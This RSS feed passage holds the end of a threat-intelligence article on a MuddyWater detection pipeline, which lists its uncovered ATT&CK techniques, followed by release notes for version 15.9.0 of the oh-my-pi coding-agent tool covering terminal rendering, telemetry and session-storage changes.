or a local HTTPS proxy target.</p><p>These are documented as open items, not dismissed as “out of scope.” The coverage score scale is designed to reflect this: a score of 3 means “behavioral detection, no lab proof” — it is honest about the gap rather than claiming coverage that was not validated.</p><p><strong>Seven ATT&amp;CK techniques have zero detection coverage.</strong> Lateral movement (T1021.001 RDP, T1550.002 Pass the Hash), Collection (T1005, T1039), Exfiltration (T1041), and Impact (T1486 ransomware, T1490 shadow copy deletion from DarkBit). These are acknowledged in the coverage matrix, not hidden. The actor uses them. The public source base documents them. The detection coverage does not exist in this iteration.</p><p><em>All code, data, and proof screenshots are version-controlled at </em><a href="https://github.com/anpa1200/operation-desert-hydra"><em>github.com/anpa1200/operation-desert-hydra</em></a></p><h3>Follow My Work</h3><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><ul><li><strong>Portfolio / Knowledge Base:</strong> <a href="https://anpa1200.github.io/">https://anpa1200.github.io/</a></li><li><strong>Medium:</strong> <a href="https://medium.com/@1200km">https://medium.com/@1200km</a></li><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200">https://github.com/anpa1200</a></li><li><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></li></ul><h4><strong>Andrey Pautov</strong></h4><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=34da7917acf0" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0">Operation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.9.0]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Fixed

Fixed MiniMax-compatible OpenAI-completions hosts (e.g. minimax-code-cn/MiniMax-M3) losing tool-call arguments when the stream delivers function.arguments as a complete object instead of the OpenAI JSON-string contract. The streaming buffer previously concatenated the objec...]]></description>
<link>https://tsecurity.de/de/3580239/tools/v1590/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580239/tools/v1590/</guid>
<pubDate>Mon, 08 Jun 2026 02:51:02 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed MiniMax-compatible OpenAI-completions hosts (e.g. <code>minimax-code-cn/MiniMax-M3</code>) losing tool-call arguments when the stream delivers <code>function.arguments</code> as a complete object instead of the OpenAI JSON-string contract. The streaming buffer previously concatenated the object into a string, coercing it to <code>[object Object]</code> and leaving <code>bash</code>/<code>edit</code> calls with empty or malformed inputs; the tool-call block now holds the object payload directly. (<a href="https://github.com/can1357/oh-my-pi/issues/1776" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1776/hovercard">#1776</a>)</li>
<li>Fixed Cloud Code Assist (Gemini / Antigravity) rejecting tool schemas with <code>Invalid JSON payload received. Unknown name "propertyNames"</code> (HTTP 400) when a tool exposed a property literally named <code>properties</code> (e.g. the Resend MCP <code>create_contact</code> tool). The schema normalizer's <code>insideProperties</code> flag was re-asserted when descending into such a property's value schema, so Google-unsupported keywords (<code>propertyNames</code>, <code>additionalProperties</code>, …) nested inside it were never stripped. The flag is now only set when entering a real <code>properties</code> map from a schema node, not from within another <code>properties</code> map.</li>
<li>Fixed local/self-hosted providers leaking machine-specific endpoints into the bundled <code>models.json</code>. A <code>generate-models</code> run on a machine with a LiteLLM proxy baked 1202 <code>litellm</code> models pinned to <code>http://localhost:4000/v1</code> into the committed catalog. <code>litellm</code> (and <code>lm-studio</code>) now join <code>ollama</code>/<code>vllm</code> in the generator's discovery-only exclusion set, so local providers are never fetched during generation nor written to <code>models.json</code> — they are discovered dynamically at runtime instead. LiteLLM model discovery now enriches metadata against models.dev (the same reference source the other gateway providers use) rather than a bundled reference map. Added a regression test pinning the invariant (no local provider blocks, no loopback/private-network <code>baseUrl</code>s in the bundled catalog).</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed synchronous <code>readTextSync</code> from <code>SessionStorage</code> and core implementations (<code>MemorySessionStorage</code>, <code>FileSessionStorage</code>, <code>RedisSessionStorage</code>, <code>SqlSessionStorage</code>), requiring callers to use async text reads</li>
<li>Replaced the public <code>SessionStorage</code> <code>readTextPrefix(path, maxBytes)</code> and <code>readTextSuffix(path, maxBytes)</code> methods with <code>readTextSlices(path, prefixBytes, suffixBytes): Promise&lt;[string, string]&gt;</code>; custom session storage backends must implement the new combined slice API.</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added env-driven OpenTelemetry trace export. When <code>OTEL_EXPORTER_OTLP_ENDPOINT</code> (or <code>OTEL_EXPORTER_OTLP_TRACES_ENDPOINT</code>) is set, <code>omp</code> registers a global OTLP/proto trace exporter and switches on the agent loop's telemetry, so the <code>invoke_agent</code> / <code>chat</code> / <code>execute_tool</code> spans actually reach a collector instead of a no-op tracer. Honors the standard <code>OTEL_*</code> env contract (endpoint, headers, <code>OTEL_SERVICE_NAME</code>, <code>OTEL_SDK_DISABLED</code> and <code>OTEL_TRACES_EXPORTER=none</code> parsed case-insensitively) and the <code>OTEL_INSTRUMENTATION_GENAI_CAPTURE_MESSAGE_CONTENT</code> capture toggle; it is a no-op when no endpoint is configured. Only the <code>http/protobuf</code> transport is supported — a <code>grpc</code> or <code>http/json</code> <code>OTEL_EXPORTER_OTLP*_PROTOCOL</code> declines rather than misrouting spans. This makes the existing telemetry usable from headless hosts that run <code>omp</code> as a spawned child process, where an in-process <code>TracerProvider</code> registered by the parent can't reach the child. Uses the <code>@opentelemetry/exporter-trace-otlp-proto</code> 2.x line, which exports cleanly under Bun.</li>
</ul>
<h2>Fixed</h2>
<ul>
<li>Fixed the status line session name (and the editor border / status-line gap fill) being nearly illegible on light themes.</li>
<li>Added <code>IndexedSessionStorage</code> and <code>SessionStorageBackend</code> exports to support shared metadata-indexed session backends</li>
<li>Added the <code>tui.maxInlineImages</code> setting (default <code>8</code>) capping how many inline images render as live terminal graphics. Once a new image pushes the count past the cap, the oldest images are hidden via a full redraw — replaced by their <code>[Image: …]</code> text placeholder and purged from the terminal's graphics store — so long sessions with many screenshots/diagrams stop piling up images (and, on Kitty, stop leaving scrollback ghosts). Set to <code>0</code> to keep every image inline.</li>
<li>Added a "View: terminal state" item to the <code>/debug</code> menu that prints the detected terminal, live geometry and cell size, multiplexer, and the negotiated subprotocols actually in use — graphics (Kitty/iTerm2/Sixel), desktop notifications (BEL/OSC 9/OSC 99, plus whether OSC 99 was confirmed via a device-attributes probe), OSC 8 hyperlinks, 24-bit color, DECCARA rectangular-SGR background fills, and DEC 2026 synchronized output — alongside the scrollback-clear strategy (<code>CSI 22 J</code> vs <code>CSI 2 J</code> redraw / ED3 eager-erase risk) and the raw <code>TERM</code>/<code>TERM_PROGRAM</code>/<code>COLORTERM</code> detection signals.</li>
<li>Added a "Test: terminal protocols" item to the <code>/debug</code> menu that renders one live sample of every special escape protocol the renderer can emit — SGR text attributes (bold/italic/underline/strikethrough/inverse/dim), themed and 24-bit truecolor, OSC 8 hyperlinks, OSC 66 text sizing (large text), and an inline graphics swatch via the active image protocol (Kitty/iTerm2/Sixel, with a text fallback) — and fires a desktop notification, so you can eyeball which protocols the current terminal actually honors. The sample image is a gradient PNG generated in-process, so the graphics test needs no asset on disk.</li>
<li>Added the <code>tui.textSizing</code> setting (default off) that renders Markdown H1 headings at 2x scale via Kitty's OSC 66 text-sizing protocol. It replaces the undocumented <code>PI_TUI_TEXT_SIZING</code> env var with a real setting, and only takes effect on Kitty terminals (where OSC 66 is implemented) — it is ignored everywhere else so headings never emit raw escape bytes.</li>
<li>Added a lifecycle status to the <code>/resume</code> session picker. Each session's tail (last 32 KiB) is now read alongside the existing header window in a single pass, and its final message classified as <code>done</code> (the agent ended its turn and yielded control back), <code>interrupted</code> (a trailing tool call or tool result the loop never continued from), <code>aborted</code>, <code>error</code>, or <code>pending</code> (a trailing user message with no reply). The status renders as a colored segment on each session's metadata line. When the final message is larger than the tail window the status is omitted rather than guessed.</li>
<li>Added support for <code>disable-model-invocation: true</code> frontmatter field from the <a href="https://agentskills.io/specification" rel="nofollow">Agent Skills standard</a>. Skills using this field are now hidden from the system prompt listing, matching the behavior of <code>hide: true</code>.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed the <code>task</code> tool description to tag read-only agents and explicitly forbid assigning them file edits/commands or offloading reasoning to <code>quick_task</code>/<code>explore</code>.</li>
<li>Changed Redis and SQL session storage initialization to load only indexed metadata (<code>size</code>, <code>mtimeMs</code>) instead of full session content</li>
<li>Changed <code>SessionStorage</code> read paths to rely on backend-backed metadata/indexed storage, so session content is fetched on demand rather than cached as full in-memory mirrors</li>
<li>Changed session-list slice reads to go through <code>SessionStorage.readTextSlices</code> across all backends, removing the file-only single-open branch and caller-managed buffers. <code>FileSessionStorage</code> now reads both windows via <code>peekFileEnds</code>, while Redis and SQL backends encode session content once per combined read.</li>
<li>Changed the <code>ask</code> tool transcript renderer to mark single-choice questions with circular radio glyphs (<code>○</code>/<code>◉</code>) instead of the rectangular checkbox glyphs (<code>☐</code>/<code>☑</code>) it shares with multi-select questions, so a "pick one" combo box visually reads as a radio group rather than a checklist. Multi-select questions keep checkboxes. Added a <code>radio.selected</code>/<code>radio.unselected</code> symbol pair across the unicode, nerd-font, and ASCII presets.</li>
<li>Changed the <code>ask</code> tool transcript renderer to mark the chosen answer inside the question form rather than re-listing the questions in a detached summary block below it. Once a question is answered, the standalone prompt preview is dropped and the result redraws the same form — every offered option still shown, with the selected one(s) filled in (<code>◉</code>/<code>☑</code>, highlighted) and the rest dimmed (<code>○</code>/<code>☐</code>); custom free-text answers and cancellations render in place as the final entry. This removes the duplicate question/option listing that previously appeared once as the call preview and again as the result.</li>
<li>Changed task-completion and <code>ask</code> desktop notifications to structured terminal notifications (title, body, type, and a focus-on-click action). On Kitty these render through OSC 99 as a proper title/body with click-to-focus; terminals without confirmed OSC 99 support collapse them to the previous single-line message (BEL/OSC 9).</li>
<li>Updated the "each kitty/tmux split" tip to include cmux.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed tiny-model startup in compiled binaries by resolving <code>@huggingface/transformers</code> and its runtime dependencies from the installed cache using <code>package.json</code> <code>exports</code>/<code>main</code> metadata, preventing module-resolution failures when launching models</li>
<li>Fixed tiny runtime installation flow in compiled binaries by using the build-time resolved <code>@huggingface/transformers</code> version and ensuring the runtime lock directory’s parent exists before acquiring the install lock, preventing mismatch and setup failures on fresh installs</li>
<li>Fixed the terminal protocol debug probe reusing one stable Kitty graphics id across repeated panels, which could move/replace an earlier swatch instead of rendering a new one.</li>
<li>Fixed selector dialogs (the <code>ask</code> tool, hook prompts) collapsing to a single visible option on shorter terminals when options carried long descriptions: the highlighted option's wrapped description consumed the entire row budget, hiding every other option and making the menu feel unnavigable (down moved the lone visible entry, left/right did nothing). When the fully-expanded list overflows, <code>HookSelectorComponent</code> now renders a compact list — every option label stays on screen and only the highlighted option expands its description, truncated to the remaining rows — so the whole menu is always visible and the detail pane follows the cursor.</li>
<li>Fixed <code>read</code> failing with "Path not found" on web URLs whose scheme <code>//</code> collapsed to a single <code>/</code> (e.g. <code>https:/github.com/...</code>), which happens when a URL is routed through Node's <code>path.normalize</code>/<code>path.resolve</code>. The fetch URL recognizer now accepts a single-slash scheme and repairs it back to <code>//</code> before fetching, so collapsed URLs resolve instead of falling through to filesystem lookup.</li>
<li>Fixed subagent slow-model priority falling through to older Claude Opus aliases when Opus 4.8 is available by adding Opus 4.8 and 4.7 aliases ahead of older Opus fallbacks (<a href="https://github.com/can1357/oh-my-pi/issues/1753" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1753/hovercard">#1753</a>).</li>
<li>Fixed the web-search provider selectors in TUI settings/setup to derive from the shared provider metadata, so newly added providers cannot be omitted from the preference list.</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Fixed</h3>
<ul>
<li>Bounded sorted <code>glob()</code> scans to <code>maxResults</code> during uncached traversal and emitted <code>onMatch</code> callbacks only for entries admitted to the bounded top-<code>maxResults</code> heap so broad OMP <code>find</code> progress and timeout partials stay consistent with the returned mtime-ranked set while keeping parent-process memory bounded (<a href="https://github.com/can1357/oh-my-pi/issues/1761" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1761/hovercard">#1761</a>).</li>
<li>Fixed <code>wrapTextWithAnsi</code> hanging (infinite loop) on text containing a BEL-terminated string escape — DCS/SOS/PM/APC (<code>ESC P</code>/<code>ESC X</code>/<code>ESC ^</code>/<code>ESC _</code>) closed by <code>BEL</code> instead of <code>ST</code>. <code>ansi_seq_len_u16</code> only accepted the <code>ST</code> (<code>ESC \</code>) terminator for these (OSC already accepted both), so a BEL-terminated APC such as the TUI cursor marker (<code>ESC _ pi:c BEL</code>) was left unclassified: it was miscounted as visible width and <code>break_long_word</code>'s non-ESC scan could not advance past the <code>ESC</code>, spinning forever. The terminator set now matches OSC (ST <strong>or</strong> BEL), and <code>break_long_word</code> defensively emits and steps over any escape it cannot classify so a malformed/unknown sequence can never wedge the wrap loop.</li>
</ul>
<h2>@oh-my-pi/swarm-extension</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed swarm <code>/swarm run</code> failing with authStorage/modelRegistry identity error (<a href="https://github.com/can1357/oh-my-pi/issues/1472" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1472/hovercard">#1472</a>)</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li>Added Kitty <code>CSI 22 J</code> screen-to-scrollback clears for non-destructive full paints, while keeping ED3 for destructive history/session rebuilds.</li>
<li>Added Kitty OSC 99 rich notification formatting and startup capability probing.</li>
<li>Added Kitty OSC 66 text-sized Markdown H1 headings (2x scale) plus native text-width support for OSC 66 spans. Off by default and gated to Kitty (the only terminal implementing OSC 66) via the <code>TERMINAL.textSizing</code> capability; hosts enable it through <code>setTextSizing</code>.</li>
<li>Added Kitty Unicode placeholder image rendering (<code>U=1</code> + U+10EEEE with explicit row/column diacritics): inline images are drawn as real text cells that carry the image id in their foreground color, so they survive horizontal slicing, reflow, and overlapping draws instead of relying on cursor-positioned <code>a=p</code> placements. Enabled by default on Kitty-family terminals; opt out with <code>PI_NO_KITTY_PLACEHOLDERS=1</code>, and falls back to direct placement when a grid exceeds the diacritic table's addressable range.</li>
<li>Added Kitty temp-file image transmission (<code>t=t</code>): on local sessions, decoded PNG bytes are written to a <code>tty-graphics-protocol</code> temp file and the path is sent instead of in-band base64, gated behind a startup <code>a=q,t=t</code> support probe. Controlled by <code>PI_KITTY_IMAGE_TRANSMISSION=direct|temp-file|auto</code>; disabled over SSH unless explicitly forced.</li>
<li>Added DECRQM capability detection for DEC private modes 2026 (synchronized output) and 2048 (in-band resize). Synchronized-output paint wrappers are dropped when the terminal reports 2026 unsupported (preserving the <code>PI_NO_SYNC_OUTPUT</code> override), and DEC 2048 in-band resize is enabled when supported — reported geometry and cell pixel size are updated from <code>CSI 48 ; rows ; cols ; yPx ; xPx t</code> reports, with SIGWINCH and <code>CSI 16 t</code> kept as fallbacks.</li>
<li>Added an injectable render scheduler for TUI tests, allowing deterministic render drains without patching global clocks or event-loop timing.</li>
<li>Added <code>ImageBudget</code>, an inline-image cap that keeps only the most recent N images as live terminal graphics and demotes older ones to their text fallback. Once a new image pushes the count past the cap, the renderer hides the oldest via a full redraw plus an explicit Kitty graphics purge (<code>a=d,d=I</code>) — text-clear escapes (<code>CSI 2 J</code>/<code>CSI 3 J</code>) do not remove Kitty images. Configure the cap via <code>TUI#setMaxInlineImages</code> (<code>0</code> disables it).</li>
<li>Changed Kitty inline images to a transmit-once + placement scheme: the base64 data is sent a single time (<code>a=t</code>) keyed by a stable image id, then every repaint emits only the tiny placement (<code>a=p,i=…,p=…</code>). Repaints — including full redraws — no longer re-send image data or stack duplicate placements, and the diff/line buffers and render caches hold short placement strings instead of multi-KB base64. The <code>ImageBudget</code> doubles as the transmit store (it tracks which ids are loaded and re-transmits after a purge frees the data). iTerm2/Sixel, which have no addressable image store, keep sending inline data as before.</li>
<li>Added a renderer-level DECCARA rectangular-SGR optimizer that paints solid background panels/rows (Box/Text/Markdown fills, status bars, any full-width <code>theme.bg</code> row) as a single coalesced rectangle escape (<code>CSI 2*x</code> / <code>CSI Pt;Pl;Pb;Pr;&lt;sgr&gt;$r</code> / <code>CSI *x</code>) instead of emitting a full-width run of background-styled spaces on every visible row. It operates at emit time on the final ANSI strings — components are unchanged — and strips only trailing padding it can prove sits under a single non-default background span, coalescing vertically adjacent identical fills into one rectangle and falling back to the original bytes whenever the rectangle would not save bytes. Enabled only on Kitty, which implements the SGR-background extension (<code>docs/deccara.rst</code>); <strong>Ghostty is intentionally excluded</strong> because its <code>CSI $r</code> is unimplemented (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1931418915" data-permission-text="Title is private" data-url="https://github.com/ghostty-org/ghostty/issues/632" data-hovercard-type="issue" data-hovercard-url="/ghostty-org/ghostty/issues/632/hovercard" href="https://github.com/ghostty-org/ghostty/issues/632">ghostty-org/ghostty#632</a>) and would drop the background entirely. Scrollback-bound rows and the append/scroll paths always keep the padded representation so native history preserves colored cells, and the <code>PI_NO_DECCARA</code> kill switch (plus tmux/screen/zellij detection) forces the fallback.</li>
<li>Added <code>CMUX_SURFACE_ID</code> environment variable support to <code>getTerminalId()</code>, so cmux terminal surfaces get a stable identifier alongside kitty, tmux, macOS Terminal.app, and Windows Terminal — enabling per-surface session breadcrumbs for <code>omp -c</code> in cmux.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed TUI tests to use Ghostty's VT engine (<code>ghostty-web</code>) instead of <code>@xterm/headless</code>.</li>
<li>Changed the default inline-image live graphics budget from 3 to 8 images.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>
<p>Fixed the DECCARA background-fill optimizer rejecting or repainting the wrong cells when a trailing fill crossed from default-background spaces into colored spaces.</p>
</li>
<li>
<p>Fixed DEC private-mode reports with DECRPM status 3/4 being treated as unsupported, so permanent 2026/2048 reports stay recognized.</p>
</li>
<li>
<p>Fixed OSC 66 text-sizing width and slicing edge cases, including ZWJ emoji payloads and partial slices through scaled spans.</p>
</li>
<li>
<p>Fixed focused <code>Input</code> components following <code>TUI#setShowHardwareCursor</code>, so single-line prompts render either the terminal cursor or software cursor consistently with the editor.</p>
</li>
<li>
<p>Fixed the DECCARA background-fill optimizer painting fills on the wrong rows ("split into unaligned halves") in the differential repaint path. When a diff grew the transcript past the viewport, writing the rewritten rows scrolled the terminal, but the absolute DECCARA rectangle coordinates were derived from the pre-scroll viewport top, so every fill landed <code>scrollAmount</code> rows too low while the relatively-positioned text settled correctly; rows scrolled into history were also shortened, dropping their background padding from native scrollback. Rectangles now target the post-scroll rows and only rows remaining in the final viewport are optimized.</p>
</li>
<li>
<p>Fixed native scrollback desynchronization after terminal width or height changes reflowed overflowing content while the viewport was not at the bottom</p>
</li>
<li>
<p>Fixed a notification chip (or any injected block) rendering on top of an actively streaming tool render on ED3-risk terminals (Ghostty/kitty/Alacritty/iTerm2). While a foreground tool streams, its header's elapsed-time counter ticks every frame; once output scrolls the header above the viewport top, each tick is an offscreen edit that — because the eager scrollback-rebuild opt-in is gated off on these terminals — repaints the viewport in place and advances the rendered line count without committing the new overflow to native history. <code>#scrollbackHighWater</code> then lagged the logical viewport top, so a later content shrink whose changes landed in the visible region slipped past the shrink-across-boundary guard and reached the differential emitter, which is anchored to <code>#maxLinesRendered - height</code>: it rewrote only the suffix, dropped the newly exposed top row, and left a blank at the bottom, drifting every row below the edit one line up so it painted over the rows above. Such shrinks now re-anchor the bottom of the viewport with a non-destructive repaint, and the foreground-streaming shrink-across-boundary case repaints the live tail instead of padding and pinning the pre-shrink viewport.</p>
</li>
<li>
<p>Fixed a terminal resize during foreground-tool streaming on an unknown-viewport / ED3-risk host (Ghostty/kitty/Alacritty/iTerm2/WSL) leaving native scrollback permanently out of sync, so scrolling back after the turn showed missing rows. A pure geometry resize (no content change) takes the in-place viewport-repaint path, which — unlike a content-bearing resize that rebuilds via the geometry branch — never flagged native history. Because the prompt-submit checkpoint (<code>refreshNativeScrollbackIfDirty</code>) only rebuilds when scrollback is marked dirty on these hosts, the discrepancy was never reconciled. Overflowing geometry repaints whose viewport is not known to be at the bottom now mark scrollback dirty so the next checkpoint rebuilds an exact copy of the transcript.</p>
</li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Added</h3>
<ul>
<li>
<p>Added color helpers <code>colorLuma</code> (perceptual luma), <code>relativeLuminance</code> (WCAG, linearized sRGB), and <code>hslToHex</code> to the color utilities. The luminance helpers parse <code>#rgb</code>/<code>#rrggbb</code> hex and 256-color palette indices, returning <code>undefined</code> for unparseable values.</p>
</li>
<li>
<p>Added <code>peekFileEnds</code>, a single-open head-and-tail file peek helper that reuses the head bytes for the tail when the file fits the head window.</p>
</li>
<li>
<p>Added <code>peekFileTail</code>, the tail mirror of <code>peekFile</code>: reads up to the last <code>maxBytes</code> of a file ending at EOF, reusing the same pooled-buffer strategy (no per-call allocation for small reads).</p>
</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(search): default paths to workspace root instead of hard-failing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GratefulDave/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GratefulDave">@GratefulDave</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4584846316" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1808" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1808/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1808">#1808</a></li>
<li>fix: recognize disable-model-invocation from Agent Skills spec by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fabkho/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fabkho">@fabkho</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583326357" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1803" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1803/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1803">#1803</a></li>
<li>fix(coding-agent/mcp): handle async broken-pipe rejections in stdio transport by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VoidChecksum/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VoidChecksum">@VoidChecksum</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4578318423" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1783" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1783/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1783">#1783</a></li>
<li>Fix slow agent Opus priority by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daandden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daandden">@daandden</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576811309" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1754" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1754/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1754">#1754</a></li>
<li>fix(swarm): remove redundant authStorage discovery from swarm pipeline (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538706917" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1472" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1472/hovercard" href="https://github.com/can1357/oh-my-pi/issues/1472">#1472</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WodenJay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WodenJay">@WodenJay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4573308608" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1726" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1726/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1726">#1726</a></li>
<li>Fix web search provider TUI options by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daandden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daandden">@daandden</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4568591206" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1685" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1685/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1685">#1685</a></li>
<li>Add cmux terminal surface detection to getTerminalId by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/basedcorp99/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/basedcorp99">@basedcorp99</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4570212330" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1702" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1702/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1702">#1702</a></li>
<li>fix(natives): bound sorted glob scans by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4577407079" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1762" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1762/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1762">#1762</a></li>
<li>fix(tui): cap session accent luminance on light themes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paweljw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paweljw">@paweljw</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4571800449" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1715" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1715/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1715">#1715</a></li>
<li>feat(coding-agent): env-driven OTLP trace export for headless hosts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgreeno/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgreeno">@cgreeno</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4581802133" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1797" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1797/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1797">#1797</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GratefulDave/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GratefulDave">@GratefulDave</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4584846316" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1808" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1808/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1808">#1808</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fabkho/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fabkho">@fabkho</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583326357" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1803" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1803/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1803">#1803</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WodenJay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WodenJay">@WodenJay</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4573308608" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1726" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1726/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1726">#1726</a></li>
